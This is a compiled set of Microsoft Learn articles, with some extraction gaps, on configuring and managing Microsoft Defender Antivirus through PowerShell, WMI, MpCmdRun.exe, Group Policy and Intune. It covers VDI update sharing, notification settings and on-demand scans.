and manage Microsoft Defender
Antivirus
Article • 12/15/2022
Applies to:

Platforms
Windows
You can use PowerShell to perform various functions in Windows Defender. Similar to
the command prompt or command line, PowerShell is a task-based command-line shell
and scripting language designed especially for system administration. You can read
more about it in the PowerShell documentation.
For a list of the cmdlets and their functions and available parameters, see the Defender
Antivirus cmdlets topic.
PowerShell cmdlets are most useful in Windows Server environments that don't rely on a
graphical user interface (GUI) to configure software.
７ Note
PowerShell cmdlets should not be used as a replacement for a full network policy
management infrastructure, such as Microsoft Endpoint Configuration Manager,
Group Policy Management Console, or Microsoft Defender Antivirus Group Policy
ADMX templates.
Changes made with PowerShell will affect local settings on the endpoint where the
changes are deployed or made. This means that deployments of policy with Group
Policy, Microsoft Endpoint Configuration Manager, or Microsoft Intune can overwrite
changes made with PowerShell.
You can configure which settings can be overridden locally with local policy overrides.
PowerShell is typically installed under the folder
%SystemRoot%\system32\WindowsPowerShell .
Use Microsoft Defender Antivirus PowerShell

cmdlets
1. In the Windows search bar, type powershell.
2. Select Windows PowerShell from the results to open the interface.
3. Enter the PowerShell command and any parameters.
７ Note
You may need to open PowerShell in administrator mode. Right-click the item in
the Start menu, click Run as administrator and click Yes at the permissions prompt.
To open online help for any of the cmdlets type the following:
PowerShell
Get-Help <cmdlet> -Online
Omit the -online parameter to get locally cached help.
 Tip

 Tip


top scans per file
Related topics
Microsoft Defender Antivirus Cmdlets
 Tip
Feedback
Use Windows Management
Instrumentation (WMI) to configure and
Article • 07/18/2023
Applies to:

Platforms
Windows
Windows Management Instrumentation (WMI) is a scripting interface that allows you to

retrieve, modify, and update settings.
Read more about WMI at the Microsoft Developer Network System Administration
library.
Microsoft Defender Antivirus has a number of specific WMI classes that can be used to
perform most of the same functions as Group Policy and other management tools.
Many of the classes are analogous to Defender for Cloud PowerShell cmdlets.
The MSDN Windows Defender WMIv2 Provider reference library lists the available WMI
classes for Microsoft Defender Antivirus, and includes example scripts.
Changes made with WMI will affect local settings on the endpoint where the changes
are deployed or made. This means that deployments of policy with Group Policy,
Microsoft Endpoint Configuration Manager, or Microsoft Intune can overwrite changes
made with WMI.
You can configure which settings can be overridden locally with local policy overrides.
 Tip

 Tip


top scans per file
Related topics
 Tip
Feedback

Configure and manage Microsoft
Defender Antivirus with the
mpcmdrun.exe command-line tool
Article • 06/06/2023
Applies to:

Platforms
Windows
You can perform various functions in Microsoft Defender Antivirus using the dedicated
command-line tool mpcmdrun.exe. This utility is useful when you want to automate
Microsoft Defender Antivirus tasks. You can find the utility in %ProgramFiles%\Windows
Defender\MpCmdRun.exe . Run it from a command prompt.
 Tip
You might need to open an administrator-level version of the command prompt.

When you search for Command Prompt on the Start menu, choose Run as
administrator. If you're running an updated Microsoft Defender antimalware
platform version, run MpCmdRun from the following location:
C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform
version> . For more information about the antimalware platform, see Microsoft
Defender Antivirus updates and baselines.
The MpCmdRun utility uses the following syntax:
Console
MpCmdRun.exe [command] [-options]
Here's an example:
Console
MpCmdRun.exe -Scan -ScanType 2
In our example, the MpCmdRun utility starts a full antivirus scan on the device.
Commands
ﾉ Expand table
Command Description
-? or -h Displays all available options for the MpCmdRun

tool
-Scan [-ScanType [<value>]] [-File <path> Scans for malicious software. Values for ScanType
[-DisableRemediation] [-BootSectorScan] [- are:
CpuThrottling]] [-Timeout <days>] [-
0 Default, according to your configuration
Cancel]
1 Quick scan
2 Full scan
3 File and directory custom scan.
CpuThrottling runs according to policy

configurations.
-Trace [-Grouping #] [-Level #] Starts diagnostic tracing
-CaptureNetworkTrace -Path <path> Captures all the network input into the Network
Protection service and saves it to a file at <path> .
Supply an empty path to stop tracing.
-GetFiles [-SupportLogLocation <path>] Collects support information. See collecting

diagnostic data.
-GetFilesDiagTrack Same as -GetFiles , but outputs to temporary

DiagTrack folder.
-RemoveDefinitions [-All] Restores the installed security intelligence to a

previous backup copy or to the original default
set.
-RemoveDefinitions [-DynamicSignatures] Removes only the dynamically downloaded

security intelligence.
-RemoveDefinitions [-Engine] Restores the previous installed engine.
-SignatureUpdate [-UNC \|-MMPC] Checks for new security intelligence updates.

Command Description
-Restore [-ListAll \|[[-Name <name>] [- Restores or lists quarantined item(s).

All] \|[-FilePath <filePath>]] [-Path
<path>]]
-AddDynamicSignature [-Path] Loads dynamic security intelligence.
-ListAllDynamicSignatures Lists the loaded dynamic security intelligence.
-RemoveDynamicSignature [-SignatureSetID] Removes dynamic security intelligence.
-CheckExclusion -path <path> Checks whether a path is excluded.
-ValidateMapsConnection Verifies that your network can communicate with

the Microsoft Defender Antivirus cloud service.
This command will only work on Windows 10,
version 1703 or higher.
-ResetPlatform Reset platform binaries back to

%ProgramFiles%\Windows Defender .
-RevertPlatform Revert platform binaries back to the previously

installed version of the Defender platform.
Common errors in running commands via

mpcmdrun.exe
The following table lists common errors that can occur while using the MpCmdRun tool.
ﾉ Expand table
Error message Possible reason
ValidateMapsConnection failed The Microsoft Defender Antivirus service is disabled. Enable

(800106BA) or 0x800106BA the service and try again. If you need help re-enabling
Microsoft Defender Antivirus, see Reinstall/enable Microsoft
Defender Antivirus on your endpoints.
Note that in Windows 10 1909 or older, and Windows Server

2019 or older, the service was formerly called Windows
Defender Antivirus.
0x80070667 You're running the -ValidateMapsConnection command from

a computer that is Windows 10 version 1607 or older, or
Windows Server 2016 or older. Run the command from a
Error message Possible reason
machine that is Windows 10 version 1703 or newer, or

Windows Server 2019 or newer.
MpCmdRun is not recognized as The tool must be run from either %ProgramFiles%\Windows
an internal or external command, Defender or C:\ProgramData\Microsoft\Windows
operable program, or batch file. Defender\Platform\4.18.2012.4-0 (where 2012.4-0 might
differ since platform updates are monthly except for March)
ValidateMapsConnection failed The command was attempted using insufficient privileges.

to establish a connection to Use the command prompt (cmd.exe) as an administrator.
MAPS (hr=80070005
httpcode=450)
ValidateMapsConnection failed The firewall is blocking the connection or conducting SSL

to establish a connection to inspection.
MAPS (hr=80070006
httpcode=451)
ValidateMapsConnection failed Possible network-related issues, like name resolution

to establish a connection to problems
MAPS (hr=80004005
httpcode=450)

MAPS (hr=0x80508015

MAPS (hr=800722F0D

MAPS (hr=80072EE7
httpcode=451)
See also
Configure Microsoft Defender Antivirus features
Configure and validate Microsoft Defender Antivirus network connections
 Tip
Feedback

notifications that appear on endpoints
Article • 02/22/2023
Applies to:

Platforms
Windows
In Windows 10 and Windows 11, application notifications about malware detection and
remediation are more robust, consistent, and concise. Microsoft Defender Antivirus
notifications appear on endpoints when scans are completed and threats are detected.
Notifications follow both scheduled and manually triggered scans. These notifications
also appear in the Notification Center, and a summary of scans and threat detections
appear at regular time intervals.
If you're part of your organization's security team, you can configure how notifications
appear on endpoints, such as notifications that prompt for a system reboot or that
indicate a threat has been detected and remediated.
Configure antivirus notifications using Group

Policy or the Windows Security app
You can configure the display of additional notifications, such as recent threat detection
summaries, in the Windows Security app and with Group Policy.
７ Note
In Windows 10, version 1607 the feature was called Enhanced notifications and
was configured under Windows Settings > Update & security > Windows
Defender. In Group Policy settings for all versions of Windows 10 and Windows 11,
the notification feature is called Enhanced notifications.
Use Group Policy to disable additional notifications

Console.
Reporting.
6. Double-click Turn off enhanced notifications, and set the option to Enabled. Then
select OK. This will prevent additional notifications from appearing.
） Important
Disabling additional notifications will not disable critical notifications, such as threat
detection and remediation alerts.
Use the Windows Security app to disable additional

notifications
1. Open the Windows Security app by clicking the shield icon in the task bar or
searching the start menu for Security.
2. Select Virus & threat protection tile (or the shield icon on the left menu bar) and,
then select Virus & threat protection settings
3. Scroll to the Notifications section and select Change notification settings.
4. Slide the switch to Off or On to disable or enable additional notifications.
） Important
Disabling additional notifications will not disable critical notifications, such as threat
detection and remediation alerts.
Configure standard notifications on endpoints

using Group Policy
You can use Group Policy to:
Display additional, customized text on endpoints when the user needs to perform
an action
Hide all notifications on endpoints
Hide reboot notifications on endpoints
Hiding notifications can be useful in situations where you can't hide the entire Microsoft
Defender Antivirus interface. See Prevent users from seeing or interacting with the
Microsoft Defender Antivirus user interface for more information. Hiding notifications
will only occur on endpoints to which the policy has been deployed. Notifications
related to actions that must be taken (such as a reboot) will still appear on the Microsoft
Configuration Manager Endpoint Protection monitoring dashboard and reports.
To add custom contact information to endpoint notifications, see Customize the

Windows Security app for your organization.
Use Group Policy to hide notifications

Console.
3. In the Group Policy Management Editor go to Computer configuration and then

Client interface.
5. Double-click Suppress all notifications and set the option to Enabled.
6. Select OK. This will prevent additional notifications from appearing.
Use Group Policy to hide reboot notifications

Console.
2. Right-click the Group Policy Object you want to configure and then select Edit.
4. Click Administrative templates.

Client interface.
6. Double-click Suppresses reboot notifications and set the option to Enabled.
7. Select OK. This will prevent additional notifications from appearing.
 Tip

 Tip
Feedback

Prevent or allow users to locally modify
Microsoft Defender Antivirus policy
settings
Article • 07/13/2023
Applies to:

Platforms
Windows
By default, Microsoft Defender Antivirus settings that are deployed via a Group Policy
Object to the endpoints in your network will prevent users from locally changing the
settings. You can change this configuration in some instances. For example, it might be
necessary to allow certain user groups, such as security researchers and threat
investigators, to have further control over individual settings on the endpoints they use.
Configure local overrides for Microsoft

Defender Antivirus settings
The default setting for these local override policies is Disabled.
If the policies are set to Enabled, users can make changes to the associated settings on
their devices by using the Windows Security app, local Group Policy settings, or
PowerShell cmdlets (where appropriate).
The table of settings section lists override policy settings and the configuration
instructions.
To configure these settings:
Edit.
2. In the Group Policy Management Editor go to Computer configuration and select

3. Expand the tree to Windows components > Microsoft Defender Antivirus and
then the Location specified in the table of settings section (in this article).
4. Double-click the policy Setting as specified in the table below, and set the option
to your desired configuration. Select OK, and repeat for any other settings.
5. Deploy the Group Policy Object as usual.
Table of settings
ﾉ Expand table
MAPS Configure local setting override for Enable cloud-delivered protection

reporting to Microsoft MAPS
Quarantine Configure local setting override for the Configure remediation for scans
removal of items from Quarantine folder
Real-time Configure local setting override for Enable and configure Microsoft
protection monitoring file and program activity on Defender Antivirus always-on
your computer protection and monitoring
protection monitoring for incoming and outgoing Defender Antivirus always-on
file activity protection and monitoring
protection scanning all downloaded files and Defender Antivirus always-on
attachments protection and monitoring
Real-time Configure local setting override for turn Enable and configure Microsoft
protection on behavior monitoring Defender Antivirus always-on
protection and monitoring
Real-time Configure local setting override to turn Enable and configure Microsoft
protection on real-time protection Defender Antivirus always-on
protection and monitoring
Remediation Configure local setting override for the Configure remediation for scans
time of day to run a scheduled full scan
Scan Configure local setting override for Configure and run scans
maximum percentage of CPU utilization
Scan Configure local setting override for Configure scheduled scans

schedule scan day

scheduled quick scan time

scheduled scan time
Scan Configure local setting override for the Configure scheduled scans
scan type to use for a scheduled scan
Configure how locally and globally defined

threat remediation and exclusions lists are
merged
You can also configure how locally defined lists are combined or merged with globally
defined lists. This setting applies to exclusion lists, specified remediation lists, and attack
surface reduction.
By default, lists that have been configured in local group policy and the Windows
Security app are merged with lists that are defined by the appropriate Group Policy
Object that you have deployed on your network. Where there are conflicts, the globally
defined list takes precedence. You can disable this setting to ensure that only globally
defined lists (such as those from any deployed GPOs) are used.
Use Group Policy to disable local list merging

2. In the Group Policy Management Editor go to Computer configuration and select

4. Double-click Configure local administrator merge behavior for lists and set the
option to Disabled. Then select OK.
７ Note
For "Administrative Templates (.admx) for Windows 11 2022 Update (22H2)" and
"Administrative Templates (.admx) for Windows 10 November 2021 Update (21H2)"
templates, set Configure local administrator merge behavior for lists to Enabled
to disable the local administrator merge behavior.
Use Microsoft Intune to disable local list merging

1. In the Microsoft Intune admin center , select Endpoint security > Antivirus.
2. Choose Create Policy, or modify an existing Microsoft Defender Antivirus policy.
3. Under the Configuration settings, select the drop-down next to Disable Local
Admin Merge and select Disable Local Admin Merge.
７ Note
If you disable local list merging, it will override controlled folder access settings. It
also overrides any protected folders or allowed apps set by the local administrator.
For more information about controlled folder access settings, see Allow a blocked
app in Windows Security .
 Tip

Related topics
Microsoft Intune
Microsoft Defender Antivirus in Windows
Configure end-user interaction with Microsoft Defender Antivirus
 Tip
Feedback

Prevent users from seeing or interacting
with the Microsoft Defender Antivirus
user interface
Article • 07/26/2023
Applies to:

Platforms
Windows
You can use Group Policy to prevent users on endpoints from seeing the Microsoft
Defender Antivirus interface. You can also prevent them from pausing scans.
Hide the Microsoft Defender Antivirus interface

In Windows 10, versions 1703, hiding the interface hides Microsoft Defender Antivirus
notifications and prevent the Virus & threat protection tile from appearing in the
With the setting set to Enabled:


With the setting set to Disabled or not configured:


７ Note
Hiding the interface will also prevent Microsoft Defender Antivirus notifications
from appearing on the endpoint. Microsoft Defender for Endpoint notifications will
still appear. You can also individually configure the notifications that appear on
endpoints
In earlier versions of Windows 10, the setting hides the Windows Defender client
interface. If the user attempts to open it, they'll receive a warning that says, "Your system
administrator has restricted access to this app."

Use Group Policy to hide the Microsoft

Defender Antivirus interface from users
Client interface.
5. Double-click the Enable headless UI mode setting and set the option to Enabled.
Select OK.
See Prevent users from locally modifying policy settings for more options on preventing
users from modifying protection on their PCs.
Prevent users from pausing a scan

You can prevent users from pausing scans, which can be helpful to ensure scheduled or
on-demand scans aren't interrupted by users.
７ Note
This setting is not supported on Windows 10.
Use Group Policy to prevent users from pausing a scan

4. Expand the tree to Windows components > Microsoft Defender Antivirus > Scan.
5. Double-click the Allow users to pause scan setting and set the option to Disabled.
Select OK.
UI Lockdown mode
Indicates whether to disable UI Lockdown mode. If you specify a value of $True ,
Microsoft Defender Antivirus disables UI Lockdown mode. If you specify a value of
$False or don't specify a value, UI Lockdown mode is enabled.
PS C:\>Set-MpPreference -UILockdown $true
Related articles
Configure the notifications that appear on endpoints
Configure end-user interaction with Microsoft Defender Antivirus
 Tip
 Tip

Feedback

Deploy, manage, and report on
Article • 11/15/2023
Applies to:

Platforms
Windows
Microsoft Defender Antivirus is installed as a core part of Windows 10 and 11, and is
included in Windows Server 2016 and later (Windows Server 2012 requires Microsoft
Defender for Endpoint). You can manage and report on Microsoft Defender Antivirus
using one of several tools, such as:
Microsoft Intune
PowerShell
Group Policy and Microsoft Entra ID
Windows Management Instrumentation
This article describes these options for deployment, management, and reporting.
Microsoft Intune
With Intune, you can manage device security through policies, such as a policy to
configure Microsoft Defender Antivirus and other security capabilities in Defender for
Endpoint. To learn more, see Use policies to manage device security.
For reporting, you can choose from several options:
Use the Microsoft Defender portal, which includes a device inventory list. To access
the device inventory, in the Microsoft Defender portal
(https://security.microsoft.com/ ), go to Assets > Devices. The device inventory
list displays onboarded devices along with their health state and risk level.
Manage devices with Intune, which includes the ability to view detailed information
about devices and take action. Available actions include starting an antivirus scan,
restarting a device, locating a device, wiping a device, and more.
With Configuration Manager, you can manage security and malware on Configuration
Manager client computers. Use the Endpoint Protection point site system role and
enable Endpoint Protection with custom client settings. You can use default and
customized antimalware policies.
For reporting, you can choose from several options:
Use Intune to view device details.
Use the default Configuration Manager Monitoring workspace.
Create email alerts.
If your organization has Defender for Endpoint, you can also use the Microsoft
Defender portal, which includes a device inventory list. To access the device
inventory, in the Microsoft Defender portal (https://security.microsoft.com/ ), go
to Assets > Devices. The device inventory list displays onboarded devices along
with their health state and risk level.
PowerShell
You can use PowerShell with Group Policy or Configuration Manager to manage
Microsoft Defender Antivirus on client devices. You can also use PowerShell to manage
Microsoft Defender Antivirus manually on individual devices that are not managed by a
security team.
Use the appropriate Get- cmdlets available in the Defender module.
Use the Set-MpPreference and Update-MpSignature cmdlets that are available in

the Defender module.
For reporting, you can choose from the following options:
Use Intune to view device details.
Use the default Configuration Manager Monitoring workspace.
Group Policy and Microsoft Entra ID

You can use a Group Policy Object to deploy configuration changes and ensure
Microsoft Defender Antivirus is enabled. Use Group Policy Objects (GPOs) to configure
update options for Microsoft Defender Antivirus and configure Windows Defender
features.
For reporting, keep in mind that device reporting isn't available with Group Policy.
You can generate a list of Group Policies to determine if any settings or policies
aren't applied.
If your organization has Defender for Endpoint, you can also use the Microsoft
Defender portal, which includes a device inventory list. To access the device
inventory, in the Microsoft Defender portal (https://security.microsoft.com/ ), go
to Assets > Devices. The device inventory list displays onboarded devices along
with their health state and risk level.
Windows Management Instrumentation

With Windows Management Instrumentation (WMI), you can manage Microsoft
Defender Antivirus with Group Policy or Configuration Manager. You can also use WMI
to manage Microsoft Defender Antivirus manually on individual devices that aren't
managed by a security team.
Use the Set method of the MSFT_MpPreference class and the Update method of
the MSFT_MpSignature class.
Use the MSFT_MpComputerStatus class and the get method of associated classes
in the Windows Defender WMIv2 Provider.
For reporting, Windows events comprise several security event sources, including
Security Account Manager (SAM) events (enhanced for Windows 10. Also see Security
auditing and Windows Defender events.
See also
Deploy and enable Microsoft Defender Antivirus protection
Monitor and report on Microsoft Defender Antivirus protection
 Tip
processes, and file extensions might be causing performance issues. You can use
the information gathered using Performance analyzer to better assess performance
issues and apply remediation actions. See Performance analyzer for Microsoft
Defender Antivirus.
 Tip
Feedback

on a remote desktop or virtual desktop
infrastructure environment
Article • 03/08/2023
Applies to:

Platforms
Windows
 Tip
This article is designed for customers who are using Microsoft Defender Antivirus
capabilities only. If you have Microsoft Defender for Endpoint (which includes
Microsoft Defender Antivirus alongside additional device protection capabilities),
skip this article and proceed to Onboard non-persistent virtual desktop
infrastructure (VDI) devices in Microsoft Defender XDR.
You can use Microsoft Defender Antivirus in a remote desktop (RDS) or non-persistent
virtual desktop infrastructure (VDI) environment. Following the guidance in this article,
you can configure updates to download directly to your RDS or VDI environments when
a user signs in.
This guide describes how to configure Microsoft Defender Antivirus on your VMs for
optimal protection and performance, including how to:
Set up a dedicated VDI file share for security intelligence updates

Randomize scheduled scans
Use quick scans
Prevent notifications
Disable scans from occurring after every update
Scan out-of-date machines or machines that have been offline for a while
Apply exclusions
） Important
Although a VDI can be hosted on Windows Server 2012 or Windows Server 2016,
virtual machines (VMs) should be running Windows 10, version 1607 at a minimum,
due to increased protection technologies and features that are unavailable in
earlier versions of Windows.
Set up a dedicated VDI file share for security

intelligence
In Windows 10, version 1903, Microsoft introduced the shared security intelligence
feature, which offloads the unpackaging of downloaded security intelligence updates
onto a host machine. This method reduces the usage of CPU, disk, and memory
resources on individual machines. Shared security intelligence now works on Windows
10, version 1703 and later. You can set up this capability by using Group Policy or
PowerShell, as described in the following table:
ﾉ Expand table
Method Procedure
Group 1. On your Group Policy management computer, open the Group Policy
Policy Management Console, right-click the Group Policy Object you want to configure,
and then select Edit.
Select Administrative templates.
Expand the tree to Windows components > Microsoft Defender Antivirus >
3. Double-click Define security intelligence location for VDI clients, and then set
the option to Enabled. A field automatically appears.
4. Enter \\<sharedlocation\>\wdav-update (for help with this value, see Download

and unpackage).
5. Select OK.
Deploy the GPO to the VMs you want to test.
PowerShell 1. On each RDS or VDI device, use the following cmdlet to enable the feature: Set-
MpPreference -SharedSignaturesPath \\<shared location>\wdav-update .
Method Procedure
2. Push the update as you normally would push PowerShell-based configuration

policies onto your VMs. (See the Download and unpackage section the <shared
location> entry.)
Download and unpackage the latest updates

Now you can get started on downloading and installing new updates. We've created a
sample PowerShell script for you below. This script is the easiest way to download new
updates and get them ready for your VMs. You should then set the script to run at a
certain time on the management machine by using a scheduled task (or, if you're
familiar with using PowerShell scripts in Azure, Intune, or SCCM, you could also use
those scripts).
PowerShell
$vdmpathbase = "$env:systemdrive\wdav-update\{00000000-0000-0000-0000-"
$vdmpathtime = Get-Date -format "yMMddHHmmss"
$vdmpath = $vdmpathbase + $vdmpathtime + '}'
$vdmpackage = $vdmpath + '\mpam-fe.exe'
New-Item -ItemType Directory -Force -Path $vdmpath | Out-Null
Invoke-WebRequest -Uri 'https://go.microsoft.com/fwlink/?

LinkID=121721&arch=x64' -OutFile $vdmpackage
Start-Process -FilePath $vdmpackage -WorkingDirectory $vdmpath -ArgumentList

"/x"
You can set a scheduled task to run once a day so that whenever the package is
downloaded and unpacked then the VMs will receive the new update. We suggest
starting with once a day, but you should experiment with increasing or decreasing the
frequency to understand the impact.
Security intelligence packages are typically published once every three to four hours.
Setting a frequency shorter than four hours isn't advisable because it will increase the
network overhead on your management machine for no benefit.
You can also set up your single server or machine to fetch the updates on behalf of the
VMs at an interval and place them in the file share for consumption. This configuration
is possible when the devices have the share and read access (NTFS permissions) to the
share so they can grab the updates. To set this configuration up, follow these steps:
1. Create an SMB/CIFS file share.
2. Use the following example to create a file share with the following share
permissions.
PowerShell
PS c:\> Get-SmbShareAccess -Name mdatp$
Name ScopeName AccountName AccessControlType AccessRight

---- --------- ----------- ----------------- -----------
mdatp$ * Everyone Allow Read
７ Note
An NTFS permission is added for Authenticated Users:Read:.
For this example, the file share is:
\\fileserver.fqdn\mdatp$\wdav-update
Set a scheduled task to run the PowerShell script

1. On the management machine, open the Start menu and type Task Scheduler.
Open it and select Create task... on the side panel.
2. Enter the name as Security intelligence unpacker. Go to the Trigger tab. Select
New... > Daily, and select OK.
3. Go to the Actions tab. Select New... Enter PowerShell in the Program/Script field.
Enter -ExecutionPolicy Bypass c:\wdav-update\vdmdlunpack.ps1 in the Add
arguments field. Select OK.
4. Configure any other settings as appropriate.
5. Select OK to save the scheduled task.
You can initiate the update manually by right-clicking on the task and then selecting
Run.
Download and unpackage manually

If you would prefer to do everything manually, here's what to do to replicate the script's
behavior:
1. Create a new folder on the system root called wdav_update to store intelligence
updates, for example, create the folder c:\wdav_update .
2. Create a subfolder under wdav_update with a GUID name, such as {00000000-0000-

0000-0000-000000000000}
Here's an example: c:\wdav_update\{00000000-0000-0000-0000-000000000000}
７ Note
In the script we set it so the last 12 digits of the GUID are the year, month,
day, and time when the file was downloaded so that a new folder is created
each time. You can change this so that the file is downloaded to the same
folder each time.
3. Download a security intelligence package from

https://www.microsoft.com/wdsi/definitions into the GUID folder. The file should
be named mpam-fe.exe .
4. Open a cmd prompt window and navigate to the GUID folder you created. Use the
/X extraction command to extract the files, for example mpam-fe.exe /X .
７ Note
The VMs will pick up the updated package whenever a new GUID folder is
created with an extracted update package or whenever an existing folder is
updated with a new extracted package.
Randomize scheduled scans

Scheduled scans run in addition to real-time protection and scanning.
The start time of the scan itself is still based on the scheduled scan policy (ScheduleDay,
ScheduleTime, and ScheduleQuickScanTime). Randomization will cause Microsoft
Defender Antivirus to start a scan on each machine within a four-hour window from the
time set for the scheduled scan.
See Schedule scans for other configuration options available for scheduled scans.
Use quick scans

You can specify the type of scan that should be performed during a scheduled scan.
Quick scans are the preferred approach as they're designed to look in all places where
malware needs to reside to be active. The following procedure describes how to set up
quick scans using Group Policy.
1. In your Group Policy Editor, go to Administrative templates > Windows

components > Microsoft Defender Antivirus > Scan.
2. Select Specify the scan type to use for a scheduled scan and then edit the policy
setting.
3. Set the policy to Enabled, and then under Options, select Quick scan.
4. Select OK.
Prevent notifications
Sometimes, Microsoft Defender Antivirus notifications are sent to or persist across
multiple sessions. To help avoid user confusion, you can lock down the Microsoft
Defender Antivirus user interface. The following procedure describes how to suppress
notifications using Group Policy.
1. In your Group Policy Editor, go to Windows components > Microsoft Defender

Antivirus > Client Interface.
2. Select Suppress all notifications and then edit the policy settings.
3. Set the policy to Enabled, and then select OK.
Suppressing notifications prevents notifications from Microsoft Defender Antivirus from

showing up when scans are done or remediation actions are taken. However, your
security operations team will see the results of a scan if an attack is detected and
stopped. Alerts, such as an initial access alert, are generated and will appear in the
Microsoft Defender portal .
Disable scans after an update

Disabling a scan after an update will prevent a scan from occurring after receiving an
update. You can apply this setting when creating the base image if you have also run a
quick scan. This way, you can prevent the newly updated VM from performing a scan
again (as you've already scanned it when you created the base image).
） Important
Running scans after an update will help ensure your VMs are protected with the
latest security intelligence updates. Disabling this option will reduce the protection
level of your VMs and should only be used when first creating or deploying the
base image.

Antivirus > Security Intelligence Updates.
2. Select Turn on scan after security intelligence update and then edit the policy
setting.
3. Set the policy to Disabled.
4. Select OK.
This policy prevents a scan from running immediately after an update.
Disable the ScanOnlyIfIdle option

Use the following cmdlet, to stop a quick or scheduled scan whenever the device goes
idle if it is in passive mode.
PowerShell
Set-MpPreference -ScanOnlyIfIdleEnabled $false
You can also disable the ScanOnlyIfIdle option in Microsoft Defender Antivirus by
configuration via local or domain group policy. This setting prevents significant CPU
contention in high density environments.
For more information, see Start the scheduled scan only when computer is on but not in
use .
Scan VMs that have been offline

Antivirus > Scan.
2. Select Turn on catch-up quick scan and then edit the policy setting.
3. Set the policy to Enabled.
4. Select OK.
This policy forces a scan if the VM has missed two or more consecutive scheduled scans.
Enable headless UI mode

Antivirus > Client Interface.
2. Select Enable headless UI mode and edit the policy.
3. Set the policy to Enabled.
4. Select OK.
This policy hides the entire Microsoft Defender Antivirus user interface from end users in
your organization.
Exclusions
If you think you need to add exclusions, see Manage exclusions for Microsoft Defender
for Endpoint and Microsoft Defender Antivirus.
See also
Tech Community Blog: Configuring Microsoft Defender Antivirus for non-persistent
VDI machines
TechNet forums on Remote Desktop Services and VDI
SignatureDownloadCustomTask PowerShell script
If you're looking for information about Defender for Endpoint on non-Windows

platforms, see the following resources:
 Tip
Feedback

Review Microsoft Defender Antivirus
scan results
Article • 12/12/2023
Applies to:

Platforms
Windows
After a Microsoft Defender Antivirus scan completes, whether it's an on-demand or

scheduled scan, the results are recorded and you can view the results.
Use Microsoft Defender XDR to review scan

results
To view the scan results using Microsoft Defender XDR Endpoint, follow the below
process.
1. Sign in to Microsoft Defender portal
2. Go to Incidents & alerts > Alerts.
You can view the scanned results under Alerts.
Use Microsoft Intune to review scan results

To view the scan results using Microsoft Intune admin center, follow the below process.
1. Sign in to Microsoft Intune admin center .
2. Go to Reports.
3. Under Endpoint security, select Microsoft Defender Antivirus.
4. In the Reports tab, select Detected malware.

5. Select the Severity level from the dropdown list.
By default All severity option is selected.
6. Select Execution state from the dropdown list.
By default All execution state option is selected.
7. Select Managed by from the dropdown list.
By default All Managed by option is selected.
8. Click on Generate report.
Use Configuration Manager to review scan

results
See How to monitor Endpoint Protection status.
Use PowerShell cmdlets to review scan results

The following cmdlet returns each detection on the endpoint. If there are multiple
detections of the same threat, each detection is listed separately, based on the time of
each detection:
PowerShell
Get-MpThreatDetection

You can specify -ThreatID to limit the output to only show the detections for a specific
threat.
If you want to list threat detections, but combine detections of the same threat into a
single item, you can use the following cmdlet:
PowerShell
Get-MpThreat


to review scan results
Use the Get method of the MSFT_MpThreat and MSFT_MpThreatDetection classes.
 Tip

Related articles
Customize, initiate, and review the results of Microsoft Defender Antivirus scans
and remediation
 Tip
Feedback

Configure and run on-demand
Microsoft Defender Antivirus scans
Article • 12/15/2023
Applies to:

You can run an on-demand scan on individual endpoints. These scans will start
immediately, and you can define parameters for the scan, such as the location or type.
When you run a scan, you can choose from among three types: Quick scan, full scan,
and custom scan. In most cases, use a quick scan. A quick scan looks at all the locations
where there could be malware registered to start with the system, such as registry keys
and known Windows startup folders.
Combined with always-on, real-time protection, which reviews files when they are
opened and closed, and whenever a user navigates to a folder, a quick scan helps
provide strong protection against malware that starts with the system and kernel-level
malware. In most cases, a quick scan is sufficient and is the recommended option for
scheduled or on-demand scans. Learn more about scan types.
） Important
Microsoft Defender Antivirus runs in the context of the LocalSystem account when
performing a local scan. For network scans, it uses the context of the device
account. If the domain device account doesn't have appropriate permissions to
access the share, the scan won't work. Ensure that the device has permissions to
access the network share.
Use Microsoft Defender portal to run a scan

1. Go to the Microsoft Defender portal (https://security.microsoft.com ) and sign-in.
2. Go to the device page that you would like to run a remote scan.
3. Click on the ellipses (…).
4. Click on Run Antivirus Scan.
5. Under Select scan type, select the radio button for Quick Scan or Full Scan.
6. Add a comment.
7. Click on Confirm.
To check on the status:
1. Under Actions & submissions, select Action Center and then select History tab.
2. Click on Filters.
3. Under the Action Type, check the box for Start antivirus scan.
4. Click on Apply.
5. Select one of the radio button.
6. Under Action Status, you'll see the status such as Completed.
To check on the detections, see Review the results of Microsoft Defender Antivirus scans
| Microsoft Learn
Use Microsoft Intune to run a scan
Use endpoint security to run a scan on Windows devices

sign-in.
3. In the list of tabs, select Windows 10 unhealthy endpoints or Windows 11

unhealthy endpoints.
4. From the list of actions provided, select Quick Scan (recommended) or Full Scan.
 Tip
For more information about using Microsoft Configuration Manager to run a scan,
see Antimalware and firewall tasks: How to perform an on-demand scan.
Use devices to run a scan on a single device
sign-in.
2. From the sidebar, select Devices > All Devices and choose the device you want to
scan.
3. Select ...More and select Quick Scan (recommended) or Full Scan from the
options.
Use the Windows Security app to run a scan

For instructions on running a scan on individual endpoints, see Run a scan in the
Use PowerShell cmdlets to run a scan

PowerShell
Start-MpScan
Use PowerShell cmdlets to run a quick scan

without excluding antivirus exclusions
PowerShell
Set-MpPreference -QuickScanIncludeExclusions 1
７ Note
A value of 1 enables the inclusion of the antivirus excluded processes, folders, files,
and extensions. A value of 0 (default) disables the inclusion of the antivirus
excluded processes, folders, files, and extensions.
Defender Antivirus cmdlets.
Use the mpcmdrun.exe command-line utility to

run a scan
Use the following -scan parameter:
Console
mpcmdrun.exe -scan -scantype 1
For more information on how to use the tool and other parameters, including starting a
full scan or defining paths, see Use the mpcmdrun.exe commandline tool to configure
and manage Microsoft Defender Antivirus.

to run a scan
Use the Start method of the MSFT_MpScan class.
For more information about which parameters are allowed, see Windows Defender
WMIv2 APIs
 Tip

 Tip
Feedback

Run and review the results of a
Microsoft Defender Offline scan
Article • 12/01/2023
Applies to:

ﾉ Expand table
Applies to Type
Platform Windows
Protection type Hardware
Firmware/ Rootkit Operating system

Driver
Memory (Heap)
Application
Identity
Cloud
７ Note
The protection for this feature focuses on the Firmware/Rootkit.
Microsoft Defender Offline is an anti-malware scanning tool that lets you boot and run a
scan from a trusted environment. The scan runs from outside the normal Windows
kernel so it can target malware that attempts to bypass the Windows shell, such as
viruses and rootkits that infect or overwrite the master boot record (MBR).
You can use Microsoft Defender Offline Scan if you suspect a malware infection, or you
want to confirm a thorough clean of the endpoint after a malware outbreak.
Prerequisites and requirements

